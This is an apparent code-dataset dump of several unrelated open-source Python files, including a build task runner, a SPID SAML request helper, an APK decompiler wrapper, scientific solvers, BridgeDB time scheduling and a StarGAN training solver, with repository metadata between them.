if len(_TARGETS) > len(target_build_map.keys()):
raise Exception('Target names need to be unique')
label_build_map = {}
label_build_map['all'] = [t for t in _TARGETS] # to build all targets
for target in _TARGETS:
for label in target.labels:
if label in label_build_map:
label_build_map[label].append(target)
else:
label_build_map[label] = [target]
if set(target_build_map.keys()).intersection(label_build_map.keys()):
raise Exception('Target names need to be distinct from label names')
    return dict(list(target_build_map.items()) + list(label_build_map.items()))
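# Illustration (comment only, not executed): given a target A labeled
# {"linux"} and a target B labeled {"linux", "macos"}, _create_build_map()
# yields {"A": [A], "B": [B], "all": [A, B], "linux": [A, B], "macos": [B]},
# so invoking `-b linux -f macos` selects just [B] after the AND filter below.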
_BUILD_MAP = _create_build_map()
argp = argparse.ArgumentParser(description='Runs build/test targets.')
argp.add_argument(
'-b',
'--build',
choices=sorted(_BUILD_MAP.keys()),
nargs='+',
default=['all'],
help='Target name or target label to build.')
argp.add_argument(
'-f',
'--filter',
choices=sorted(_BUILD_MAP.keys()),
nargs='+',
default=[],
help='Filter targets to build with AND semantics.')
argp.add_argument('-j', '--jobs', default=multiprocessing.cpu_count(), type=int)
argp.add_argument(
'-t', '--travis', default=False, action='store_const', const=True)
args = argp.parse_args()
# Figure out which targets to build
targets = []
for label in args.build:
targets += _BUILD_MAP[label]
# Among targets selected by -b, filter out those that don't match the filter
targets = [t for t in targets if all(f in t.labels for f in args.filter)]
targets = sorted(set(targets))
# Execute pre-build phase
prebuild_jobs = []
for target in targets:
prebuild_jobs += target.pre_build_jobspecs()
if prebuild_jobs:
num_failures, _ = jobset.run(
prebuild_jobs, newline_on_success=True, maxjobs=args.jobs)
if num_failures != 0:
jobset.message('FAILED', 'Pre-build phase failed.', do_newline=True)
sys.exit(1)
build_jobs = []
for target in targets:
build_jobs.append(target.build_jobspec())
if not build_jobs:
print('Nothing to build.')
sys.exit(1)
jobset.message('START', 'Building targets.', do_newline=True)
num_failures, resultset = jobset.run(
build_jobs, newline_on_success=True, maxjobs=args.jobs)
report_utils.render_junit_xml_report(
resultset, 'report_taskrunner_sponge_log.xml', suite_name='tasks')
if num_failures == 0:
jobset.message(
'SUCCESS', 'All targets built successfully.', do_newline=True)
else:
jobset.message('FAILED', 'Failed to build targets.', do_newline=True)
sys.exit(1)
| 33.413793
| 80
| 0.718008
|
794db81583e691d9cd6471733e9881289a39da13
| 2,751
|
py
|
Python
|
src/djangosaml2_spid/spid_request.py
|
Martini991/spid-django
|
8f1ce59e01e3972006c75ff672b9c56a4d1234d4
|
[
"Apache-2.0"
] | 1
|
2021-12-06T14:58:24.000Z
|
2021-12-06T14:58:24.000Z
|
src/djangosaml2_spid/spid_request.py
|
damikael/spid-django
|
3ca45df31195541ac669503dc85ae753254c6d00
|
[
"Apache-2.0"
] | null | null | null |
src/djangosaml2_spid/spid_request.py
|
damikael/spid-django
|
3ca45df31195541ac669503dc85ae753254c6d00
|
[
"Apache-2.0"
] | null | null | null |
import logging
import saml2
from django.conf import settings
from django.urls import reverse
from djangosaml2.overrides import Saml2Client
from saml2.authn_context import requested_authn_context
SAML2_DEFAULT_BINDING = getattr(
settings, 'SAML2_DEFAULT_BINDING', saml2.BINDING_HTTP_POST
)
logger = logging.getLogger('djangosaml2')
def spid_sp_authn_request(conf, selected_idp, next_url=''):
client = Saml2Client(conf)
logger.debug(f'Redirecting user to the IdP via {SAML2_DEFAULT_BINDING} binding.')
# use the html provided by pysaml2 if no template was specified or it didn't exist
    # SPID wants the FQDN of the IdP, not the SSO endpoint
location_fixed = selected_idp
location = client.sso_location(selected_idp, SAML2_DEFAULT_BINDING)
authn_req = saml2.samlp.AuthnRequest()
authn_req.destination = location_fixed
    # spid-testenv2 reads the attribute consuming service index from the AuthnRequest (even though it is already present in the metadata...)
authn_req.attribute_consuming_service_index = "0"
# issuer
issuer = saml2.saml.Issuer()
issuer.name_qualifier = client.config.entityid
issuer.text = client.config.entityid
issuer.format = "urn:oasis:names:tc:SAML:2.0:nameid-format:entity"
authn_req.issuer = issuer
# message id
authn_req.id = saml2.s_utils.sid()
authn_req.version = saml2.VERSION # "2.0"
authn_req.issue_instant = saml2.time_util.instant()
name_id_policy = saml2.samlp.NameIDPolicy()
name_id_policy.format = settings.SPID_NAMEID_FORMAT
authn_req.name_id_policy = name_id_policy
authn_context = requested_authn_context(class_ref=settings.SPID_AUTH_CONTEXT)
authn_req.requested_authn_context = authn_context
# if SPID authentication level is > 1 then forceauthn must be True
authn_req.force_authn = 'true'
authn_req.protocol_binding = SAML2_DEFAULT_BINDING
assertion_consumer_service_url = client.config._sp_endpoints['assertion_consumer_service'][0][0]
authn_req.assertion_consumer_service_url = assertion_consumer_service_url
authn_req_signed = client.sign(
authn_req,
sign_prepare=False,
sign_alg=settings.SPID_SIG_ALG,
digest_alg=settings.SPID_DIG_ALG,
)
logger.debug(f'AuthRequest to {selected_idp}: {authn_req_signed}')
relay_state = next_url or reverse('djangosaml2:saml2_echo_attributes')
http_info = client.apply_binding(
SAML2_DEFAULT_BINDING,
authn_req_signed,
location,
sign=True,
sigalg=settings.SPID_SIG_ALG,
relay_state=relay_state
)
return dict(
http_response=http_info,
authn_request=authn_req_signed,
relay_state=relay_state,
session_id=authn_req.id
)
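# Hedged usage sketch (illustrative only): `conf` is assumed to be a pysaml2 SP
# configuration and `idp_entity_id` an entityID known from the loaded IdP
# metadata; with the HTTP-POST binding, apply_binding() returns the
# auto-submitting HTML form under the 'data' key of http_info.
def _spid_login_view_sketch(request, conf, idp_entity_id):
    from django.http import HttpResponse
    result = spid_sp_authn_request(conf, idp_entity_id, next_url='/')
    return HttpResponse(result['http_response']['data'])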
| 32.75
| 117
| 0.744457
|
794db86c0f04c54e26810ea29f0f98d549f3d0b4
| 3,540
|
py
|
Python
|
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | 3
|
2017-08-22T09:48:21.000Z
|
2021-02-07T21:28:26.000Z
|
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | null | null | null |
decompile.py
|
grievejia/ApkToJava
|
e38ced1abe778b8797f0bc2b784a1a6fa829b3c4
|
[
"MIT"
] | 2
|
2017-05-24T15:19:36.000Z
|
2021-02-07T21:28:27.000Z
|
#!/usr/bin/env python3
"""
Android decompiler
"""
from argparse import ArgumentParser
import logging
from pathlib import Path
import sys
import subprocess
from tempfile import TemporaryDirectory
__author__ = 'Grievejia'
__version__ = '0.1'
def sanity_check(args):
for filepath in args.files:
if not filepath.exists():
logging.error('File does not exist: %s', str(filepath))
return False
elif not filepath.is_file():
logging.error('%s is not a file', str(filepath))
return False
elif filepath.suffix != '.apk':
logging.error('%s is not an .apk file', str(filepath))
return False
if not args.output.exists():
        logging.error('Output directory does not exist: %s', str(args.output))
return False
elif not args.output.is_dir():
logging.error('Output is not a directory: %s', str(args.output))
return False
return True
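# Minimal sketch of why check=True matters below (illustrative helper, not
# called elsewhere): subprocess.run() raises CalledProcessError only when
# check=True is passed; otherwise a non-zero exit status is reported silently
# in the returned CompletedProcess object.
def _run_checked_sketch(cmd):
    import subprocess
    return subprocess.run(cmd, check=True)  # raises on non-zero exit status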
def main(args):
script_path = Path(__file__).resolve().parent
dex2jar_path = script_path.joinpath('dex2jar', 'd2j-dex2jar.sh')
if not dex2jar_path.exists() or not dex2jar_path.is_file():
logging.critical('dex2jar not found in %s', str(dex2jar_path))
sys.exit(-1)
cfr_path = script_path.joinpath('cfr.jar')
if not cfr_path.exists() or not cfr_path.is_file():
logging.critical('cfr not found in %s', str(cfr_path))
sys.exit(-1)
with TemporaryDirectory() as temp_dir:
for filepath in args.files:
print('Converting %s to jar...' % str(filepath))
tmp_jar = '%s/%s.jar' % (temp_dir, filepath.stem)
dex2jar_cmd = [str(dex2jar_path), str(filepath), '-o', tmp_jar]
logging.info('dex2jar command: %s', ' '.join(dex2jar_cmd))
try:
                subprocess.run(dex2jar_cmd, check=True)
            except subprocess.CalledProcessError:
                logging.error('dex2jar execution failed.', exc_info=True)
                sys.exit(-1)
print('Decompiling jar file...')
cfr_cmd = ['/usr/bin/env', 'java', '-jar', str(cfr_path), tmp_jar, '--outputdir', str(args.output)]
logging.info('cfr command: %s', ' '.join(cfr_cmd))
try:
                subprocess.run(cfr_cmd, check=True)
            except subprocess.CalledProcessError:
                logging.error('cfr execution failed.', exc_info=True)
                sys.exit(-1)
print('Decompilation done. Output in %s' % str(args.output))
epilog = 'system (default) encoding: {}'.format(sys.getdefaultencoding())
parser = ArgumentParser(
usage='%(prog)s [options] [FILE ...]',
description=__doc__, epilog=epilog,
prog=Path(sys.argv[0]).name
)
parser.add_argument('files', metavar='FILE', nargs='*', type=Path,
help='input apk file(s)')
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument('--verbose', '-v', action='count', default=0,
help='increase log level [WARN]')
parser.add_argument('--quiet', '-q', action='count', default=0,
help='decrease log level [WARN]')
parser.add_argument('--logfile', metavar='FILE',
help='log to file instead of <STDERR>')
parser.add_argument('--output', '-o', type=Path, help='specify the dir of output', default=Path('.'))
args = parser.parse_args()
# Logging setup
log_adjust = max(min(args.quiet - args.verbose, 2), -2) * 10
logging.basicConfig(filename=args.logfile, level=logging.WARNING + log_adjust,
                    format='%(levelname)-8s %(module)10s: %(funcName)s %(message)s')
logging.info('verbosity increased')
logging.debug('verbosity increased')
if not sanity_check(args):
sys.exit(-1)
logging.debug('Input apks: %s', ' '.join([str(x) for x in args.files]))
logging.debug('Output dir: %s', str(args.output))
main(args)
| 34.368932
| 102
| 0.682768
|
794db8b09ddaa218c809057b5bd1e0e8ce83b040
| 2,512
|
py
|
Python
|
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
core_tools/sweeps/pulse_lib_wrappers/PSB_exp.py
|
peendebak/core_tools
|
2e43edf0bbc1d7ceb7042559db499535e8f6a076
|
[
"BSD-2-Clause"
] | null | null | null |
from core_tools.utility.digitizer_param_conversions import IQ_to_scalar, down_sampler,data_reshaper, PSB_param, get_phase_compentation_IQ_signal
from core_tools.utility.mk_digitizer_param import get_digitizer_param
from core_tools.utility.dig_utility import autoconfig_dig_v2, MODES
from core_tools.drivers.M3102A import MODES, DATA_MODE, OPERATION_MODES
from core_tools.sweeps.sweep_utility import check_OD_scan
from core_tools.HVI2.schedule_manager import ScheduleMgr
from core_tools.utility.qubit_param_gen.digitizer_parameter import get_digitizer_qubit_param
import qcodes as qc
from pulse_lib.segments.utility.measurement_converter import measurement_converter
from pulse_lib.configuration.physical_channels import digitizer_channel_iq
from pulse_lib.keysight.qs_uploader import QsUploader
def add_schedule_to_lambda(schedule):
    def new_lambda(seq):
        seq.set_hw_schedule(schedule)
    return new_lambda
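# Illustration (comment only): add_schedule_to_lambda(schedule) captures
# `schedule` in a closure, so the returned callable can later be attached as
# my_seq.starting_lambda; calling it with a sequence is then equivalent to
# seq.set_hw_schedule(schedule).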
def run_qubit_exp(exp_name, sequence, mode = 'normal'):
'''
Args:
exp_name (str) : name of the experiment
sequence (sequence_builder) : sequence builder
'''
station = qc.Station.default
my_seq = sequence.forge()
my_seq.neutralise = True
my_seq.n_rep = sequence.n_rep
md = my_seq.measurements_description
n_acq = md.acquisition_count
station.dig.set_operating_mode(OPERATION_MODES.HVI_TRG)
station.dig.set_acquisition_mode(MODES.IQ_INPUT_SHIFTED_I_OUT)
active_channels = []
if not QsUploader.use_digitizer_sequencers:
print(f'QsUploader.use_digitizer_sequencers set to {QsUploader.use_digitizer_sequencers}')
for channel_name in md.acquisitions:
dig_channel = station.pulse.digitizer_channels[channel_name]
for ch in dig_channel.channel_numbers:
if n_acq[channel_name] > 0:
station.dig.set_channel_properties(ch, V_range=1.0)
station.dig.set_daq_settings(ch, my_seq.n_rep*n_acq[channel_name], 30)
active_channels.append(ch)
station.dig.set_active_channels(active_channels)
starting_lambda = add_schedule_to_lambda(ScheduleMgr().single_shot())
my_seq.starting_lambda = starting_lambda
mc = measurement_converter(md, my_seq.n_rep)
if mode == 'normal':
dig_param = mc.less_results()
else:
dig_param = mc.state_tomography_results()
dig_param.setUpParam(mc, station.dig)
my_seq.m_param = dig_param
return check_OD_scan(my_seq, dig_param) + (exp_name, )
| 36.405797
| 144
| 0.759952
|
794db934a7ddd4480315d1ea9d71cf1feecf077a
| 5,622
|
py
|
Python
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2020-10-25T13:30:20.000Z
|
2021-08-10T21:27:30.000Z
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | null | null | null |
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/P1P1/Solver.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2019-10-28T16:12:13.000Z
|
2020-01-13T13:59:44.000Z
|
from dolfin import assemble, MixedFunctionSpace, tic, toc
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import CheckPetsc4py as CP
import StokesPrecond
import NSpreconditioner
import MaxwellPrecond as MP
import MatrixOperations as MO
import PETScIO as IO
import numpy as np
import P as PrecondMulti
import MHDprec
import scipy.sparse as sp
from scipy.linalg import svd
import matplotlib.pylab as plt
from scipy.sparse.linalg.dsolve import spsolve
def solve(A,b,u,params, Fspace,SolveType,IterType,OuterTol,InnerTol,HiptmairMatrices,Hiptmairtol,KSPlinearfluids, Fp,kspF):
if SolveType == "Direct":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('preonly')
pc.setType('lu')
OptDB = PETSc.Options()
OptDB['pc_factor_mat_solver_package'] = "pastix"
OptDB['pc_factor_mat_ordering_type'] = "rcm"
ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
elif SolveType == "Direct-class":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('gmres')
pc.setType('none')
ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
else:
# u = b.duplicate()
if IterType == "Full":
ksp = PETSc.KSP()
ksp.create(comm=PETSc.COMM_WORLD)
pc = ksp.getPC()
ksp.setType('fgmres')
pc.setType('python')
pc.setType(PETSc.PC.Type.PYTHON)
OptDB = PETSc.Options()
OptDB['ksp_gmres_restart'] = 200
# FSpace = [Velocity,Magnetic,Pressure,Lagrange]
reshist = {}
def monitor(ksp, its, fgnorm):
reshist[its] = fgnorm
                print("%s  OUTER: %s" % (its, fgnorm))
# ksp.setMonitor(monitor)
ksp.max_it = 500
W = Fspace
FFSS = [W.sub(0),W.sub(1),W.sub(2),W.sub(3)]
pc.setPythonContext(MHDprec.InnerOuterMAGNETICapprox(FFSS,kspF, KSPlinearfluids[0], KSPlinearfluids[1],Fp, HiptmairMatrices[3], HiptmairMatrices[4], HiptmairMatrices[2], HiptmairMatrices[0], HiptmairMatrices[1], HiptmairMatrices[6],Hiptmairtol))
#OptDB = PETSc.Options()
# OptDB['pc_factor_mat_solver_package'] = "mumps"
# OptDB['pc_factor_mat_ordering_type'] = "rcm"
# ksp.setFromOptions()
scale = b.norm()
b = b/scale
ksp.setOperators(A,A)
del A
ksp.solve(b,u)
# Mits +=dodim
u = u*scale
MO.PrintStr("Number iterations = "+str(ksp.its),60,"+","\n\n","\n\n")
return u,ksp.its,0
IS = MO.IndexSet(Fspace,'2by2')
M_is = IS[1]
NS_is = IS[0]
kspNS = PETSc.KSP().create()
kspM = PETSc.KSP().create()
kspNS.setTolerances(OuterTol)
kspNS.setOperators(A[0])
kspM.setOperators(A[1])
# print P.symmetric
if IterType == "MD":
kspNS.setType('gmres')
kspNS.max_it = 500
pcNS = kspNS.getPC()
pcNS.setType(PETSc.PC.Type.PYTHON)
pcNS.setPythonContext(NSpreconditioner.NSPCD(MixedFunctionSpace([Fspace.sub(0),Fspace.sub(1)]), kspF, KSPlinearfluids[0], KSPlinearfluids[1],Fp))
elif IterType == "CD":
kspNS.setType('minres')
pcNS = kspNS.getPC()
pcNS.setType(PETSc.PC.Type.PYTHON)
Q = KSPlinearfluids[1].getOperators()[0]
Q = 1./params[2]*Q
KSPlinearfluids[1].setOperators(Q,Q)
pcNS.setPythonContext(StokesPrecond.MHDApprox(MixedFunctionSpace([Fspace.sub(0),Fspace.sub(1)]),kspF,KSPlinearfluids[1] ))
reshist = {}
def monitor(ksp, its, fgnorm):
reshist[its] = fgnorm
            print(fgnorm)
# kspNS.setMonitor(monitor)
uNS = u.getSubVector(NS_is)
bNS = b.getSubVector(NS_is)
# print kspNS.view()
scale = bNS.norm()
bNS = bNS/scale
        print(bNS.norm())
kspNS.solve(bNS, uNS)
uNS = uNS*scale
NSits = kspNS.its
kspNS.destroy()
# for line in reshist.values():
# print line
kspM.setFromOptions()
kspM.setType(kspM.Type.MINRES)
kspM.setTolerances(InnerTol)
pcM = kspM.getPC()
pcM.setType(PETSc.PC.Type.PYTHON)
pcM.setPythonContext(MP.Hiptmair(MixedFunctionSpace([Fspace.sub(2),Fspace.sub(3)]), HiptmairMatrices[3], HiptmairMatrices[4], HiptmairMatrices[2], HiptmairMatrices[0], HiptmairMatrices[1], HiptmairMatrices[6],Hiptmairtol))
uM = u.getSubVector(M_is)
bM = b.getSubVector(M_is)
scale = bM.norm()
bM = bM/scale
        print(bM.norm())
kspM.solve(bM, uM)
uM = uM*scale
Mits = kspM.its
kspM.destroy()
u = IO.arrayToVec(np.concatenate([uNS.array, uM.array]))
MO.PrintStr("Number of M iterations = "+str(Mits),60,"+","\n\n","\n\n")
MO.PrintStr("Number of NS/S iterations = "+str(NSits),60,"+","\n\n","\n\n")
return u,NSits,Mits
| 33.464286
| 257
| 0.574884
|
794db9d6baaa01685f9b80350dd55255b583f8a3
| 4,644
|
py
|
Python
|
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | 1
|
2016-09-21T12:55:21.000Z
|
2016-09-21T12:55:21.000Z
|
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
lib/bridgedb/Time.py
|
wfn/bridgedb
|
f266f32c365eb7a16cf156cc02f7e492266a7b51
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# BridgeDB by Nick Mathewson.
# Copyright (c) 2007-2009, The Tor Project, Inc.
# See LICENSE for licensing information
"""
This module implements functions for dividing time into chunks.
"""
import calendar
import time
KNOWN_INTERVALS = [ "hour", "day", "week", "month" ]
class Schedule:
def intervalStart(self, when):
raise NotImplementedError
def getInterval(self, when):
raise NotImplementedError
def nextIntervalStarts(self, when):
raise NotImplementedError
class IntervalSchedule(Schedule):
"""An IntervalSchedule splits time into somewhat natural periods,
based on hours, days, weeks, or months.
"""
## Fields:
## itype -- one of "month", "day", "hour".
## count -- how many of the units in itype belong to each period.
def __init__(self, intervaltype, count):
"""Create a new IntervalSchedule.
intervaltype -- one of month, week, day, hour.
count -- how many of the units in intervaltype belong to each
period.
"""
it = intervaltype.lower()
if it.endswith("s"): it = it[:-1]
if it not in KNOWN_INTERVALS:
raise TypeError("What's a %s?"%it)
assert count > 0
if it == 'week':
it = 'day'
count *= 7
self.itype = it
self.count = count
def intervalStart(self, when):
"""Return the time (as an int) of the start of the interval containing
'when'."""
if self.itype == 'month':
# For months, we always start at the beginning of the month.
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
return calendar.timegm((n//12, month, 1, 0, 0, 0))
elif self.itype == 'day':
# For days, we start at the beginning of a day.
when -= when % (86400 * self.count)
return when
elif self.itype == 'hour':
# For hours, we start at the beginning of an hour.
when -= when % (3600 * self.count)
return when
else:
assert False
def getInterval(self, when):
"""Return a string representing the interval that contains the time
**when**.
>>> import calendar
>>> from bridgedb.Time import IntervalSchedule
>>> t = calendar.timegm((2007, 12, 12, 0, 0, 0))
>>> I = IntervalSchedule('month', 1)
>>> I.getInterval(t)
'2007-12'
:param int when: The time which we're trying to find the corresponding
interval for.
:rtype: str
        :returns: A timestamp in the form ``YEAR-MONTH[-DAY[-HOUR]]``. Its
            specificity depends on what type of interval we're
using. For example, if using ``"month"``, the return value
would be something like ``"2013-12"``.
"""
if self.itype == 'month':
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
return "%04d-%02d" % (n // 12, month)
elif self.itype == 'day':
when = self.intervalStart(when) + 7200 #slop
tm = time.gmtime(when)
return "%04d-%02d-%02d" % (tm.tm_year, tm.tm_mon, tm.tm_mday)
elif self.itype == 'hour':
when = self.intervalStart(when) + 120 #slop
tm = time.gmtime(when)
return "%04d-%02d-%02d %02d" % (tm.tm_year, tm.tm_mon, tm.tm_mday,
tm.tm_hour)
else:
assert False
def nextIntervalStarts(self, when):
"""Return the start time of the interval starting _after_ when."""
if self.itype == 'month':
tm = time.gmtime(when)
n = tm.tm_year * 12 + tm.tm_mon - 1
n -= (n % self.count)
month = n%12 + 1
tm = (n // 12, month+self.count, 1, 0,0,0)
return calendar.timegm(tm)
elif self.itype == 'day':
return self.intervalStart(when) + 86400 * self.count
elif self.itype == 'hour':
return self.intervalStart(when) + 3600 * self.count
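# Worked example (illustrative): IntervalSchedule('month', 3) buckets
# when = 2013-05-17 as n = 2013*12 + 5 - 1 = 24160; n -= n % 3 gives 24159;
# then year = 24159 // 12 = 2013 and month = 24159 % 12 + 1 = 4, so the
# interval containing mid-May 2013 starts at 2013-04-01 00:00:00 UTC.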
class NoSchedule(Schedule):
"""A stub-implementation of Schedule that has only one period for
all time."""
def __init__(self):
pass
def intervalStart(self, when):
return 0
def getInterval(self, when):
return "1970"
def nextIntervalStarts(self, when):
        return 2147483647  # INT32_MAX
| 35.723077
| 78
| 0.546296
|
794dbb0ee7e8b8350c669427147314eccfd919bd
| 347
|
py
|
Python
|
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | null | null | null |
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | 1
|
2015-04-09T15:58:19.000Z
|
2015-04-14T06:37:02.000Z
|
gge_proxy_manager/tasks.py
|
mrcrgl/gge-storage
|
a8471624c1a865d4f7eeb00415bd4cd2a91ea310
|
[
"MIT"
] | null | null | null |
from .methods import clean_duplicate_players, clean_duplicate_alliances, clean_duplicate_castles
import celery
@celery.task
def clean_duplicates(*args, **kwargs):
print "Clean castles..."
clean_duplicate_castles()
print "Clean players..."
clean_duplicate_players()
print "Clean alliances..."
clean_duplicate_alliances()
| 24.785714
| 96
| 0.757925
|
794dbb832780aa5cdaa4f8a1ca99c6dd5bd6f288
| 3,078
|
py
|
Python
|
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
python/helpers/pydev/_pydev_bundle/pydev_ipython_code_executor.py
|
06needhamt/intellij-community
|
63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b
|
[
"Apache-2.0"
] | null | null | null |
import sys
import traceback
from _pydev_bundle.pydev_code_executor import BaseCodeExecutor
from _pydev_bundle.pydev_ipython_console_011 import get_pydev_ipython_frontend
from _pydevd_bundle.pydevd_constants import dict_iter_items
# Uncomment to force PyDev standard shell.
# raise ImportError()
# TODO reuse `CodeExecutor` in `InterpreterInterface` in pydev_ipython_console.py
#=======================================================================================================================
# IPythonCodeExecutor
#=======================================================================================================================
class IPythonCodeExecutor(BaseCodeExecutor):
'''
The methods in this class should be registered in the xml-rpc server.
'''
def __init__(self, show_banner=True, rpc_client=None):
super(IPythonCodeExecutor, self).__init__()
self.interpreter = get_pydev_ipython_frontend(rpc_client)
self._input_error_printed = False
self.notification_succeeded = False
self.notification_tries = 0
self.notification_max_tries = 3
self.show_banner = show_banner
def get_greeting_msg(self):
if self.show_banner:
self.interpreter.show_banner()
return self.interpreter.get_greeting_msg()
def do_add_exec(self, code_fragment):
self.notify_about_magic()
if code_fragment.text.rstrip().endswith('??'):
print('IPython-->')
try:
res = bool(self.interpreter.add_exec(code_fragment.text))
finally:
if code_fragment.text.rstrip().endswith('??'):
print('<--IPython')
return res
def get_namespace(self):
return self.interpreter.get_namespace()
def close(self):
sys.exit(0)
def notify_about_magic(self):
pass
def get_ipython_hidden_vars_dict(self):
try:
if hasattr(self.interpreter, 'ipython') and hasattr(self.interpreter.ipython, 'user_ns_hidden'):
user_ns_hidden = self.interpreter.ipython.user_ns_hidden
if isinstance(user_ns_hidden, dict):
# Since IPython 2 dict `user_ns_hidden` contains hidden variables and values
user_hidden_dict = user_ns_hidden.copy()
else:
# In IPython 1.x `user_ns_hidden` used to be a set with names of hidden variables
user_hidden_dict = dict([(key, val) for key, val in dict_iter_items(self.interpreter.ipython.user_ns)
if key in user_ns_hidden])
                # while `_`, `__` and `___` are not yet initialized, they are not present in `user_ns_hidden`
user_hidden_dict.setdefault('_', '')
user_hidden_dict.setdefault('__', '')
user_hidden_dict.setdefault('___', '')
return user_hidden_dict
except:
# Getting IPython variables shouldn't break loading frame variables
traceback.print_exc()
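    # Example (illustrative): in IPython >= 2, `user_ns_hidden` is a dict such
    # as {'_': '', 'get_ipython': <bound method>, ...}, so the copy() branch is
    # taken; in IPython 1.x it was a set of names, handled by the fallback that
    # filters `user_ns` by membership.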
| 39.974026
| 121
| 0.598116
|
794dbc0c94eb68d3f533d5b6ca14865a8896bf7e
| 34,754
|
py
|
Python
|
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | 1
|
2020-07-28T18:59:53.000Z
|
2020-07-28T18:59:53.000Z
|
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | null | null | null |
solver.py
|
michaelaesquire/stargan-morpheus
|
022eab14d26e06c24de91091fe06a207e199fb53
|
[
"MIT"
] | null | null | null |
from model import Generator
from model import Discriminator
from torch.autograd import Variable
from torchvision.utils import save_image
from torchvision.utils import make_grid
import torch
import torch.nn.functional as F
import numpy as np
import os
import time
import datetime
from PIL import Image
import cv2
class Solver(object):
"""Solver for training and testing StarGAN."""
def __init__(self, celeba_loader, rafd_loader, config):
"""Initialize configurations."""
# Data loader.
self.celeba_loader = celeba_loader
self.rafd_loader = rafd_loader
# Model configurations.
self.c_dim = config.c_dim
self.c2_dim = config.c2_dim
self.image_size = config.image_size
self.g_conv_dim = config.g_conv_dim
self.d_conv_dim = config.d_conv_dim
self.g_repeat_num = config.g_repeat_num
self.d_repeat_num = config.d_repeat_num
self.lambda_cls = config.lambda_cls
self.lambda_rec = config.lambda_rec
self.lambda_gp = config.lambda_gp
self.lambda_lvl = config.lambda_lvl
# Training configurations.
self.dataset = config.dataset
self.batch_size = config.batch_size
self.num_iters = config.num_iters
self.num_iters_decay = config.num_iters_decay
self.g_lr = config.g_lr
self.d_lr = config.d_lr
self.n_critic = config.n_critic
self.beta1 = config.beta1
self.beta2 = config.beta2
self.resume_iters = config.resume_iters
self.selected_attrs = config.selected_attrs
# Test configurations.
self.test_iters = config.test_iters
# Miscellaneous.
self.use_tensorboard = config.use_tensorboard
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Directories.
self.log_dir = config.log_dir
self.sample_dir = config.sample_dir
self.model_save_dir = config.model_save_dir
self.result_dir = config.result_dir
# Step size.
self.log_step = config.log_step
self.sample_step = config.sample_step
self.model_save_step = config.model_save_step
self.lr_update_step = config.lr_update_step
# Build the model and tensorboard.
self.build_model()
if self.use_tensorboard:
self.build_tensorboard()
def build_model(self):
"""Create a generator and a discriminator."""
if self.dataset in ['CelebA', 'RaFD']:
self.G = Generator(self.g_conv_dim, self.c_dim, self.g_repeat_num)
self.D = Discriminator(self.image_size, self.d_conv_dim, self.c_dim, self.d_repeat_num)
elif self.dataset in ['Both']:
self.G = Generator(self.g_conv_dim, self.c_dim+self.c2_dim+2, self.g_repeat_num) # 2 for mask vector.
self.D = Discriminator(self.image_size, self.d_conv_dim, self.c_dim+self.c2_dim, self.d_repeat_num)
self.g_optimizer = torch.optim.Adam(self.G.parameters(), self.g_lr, [self.beta1, self.beta2])
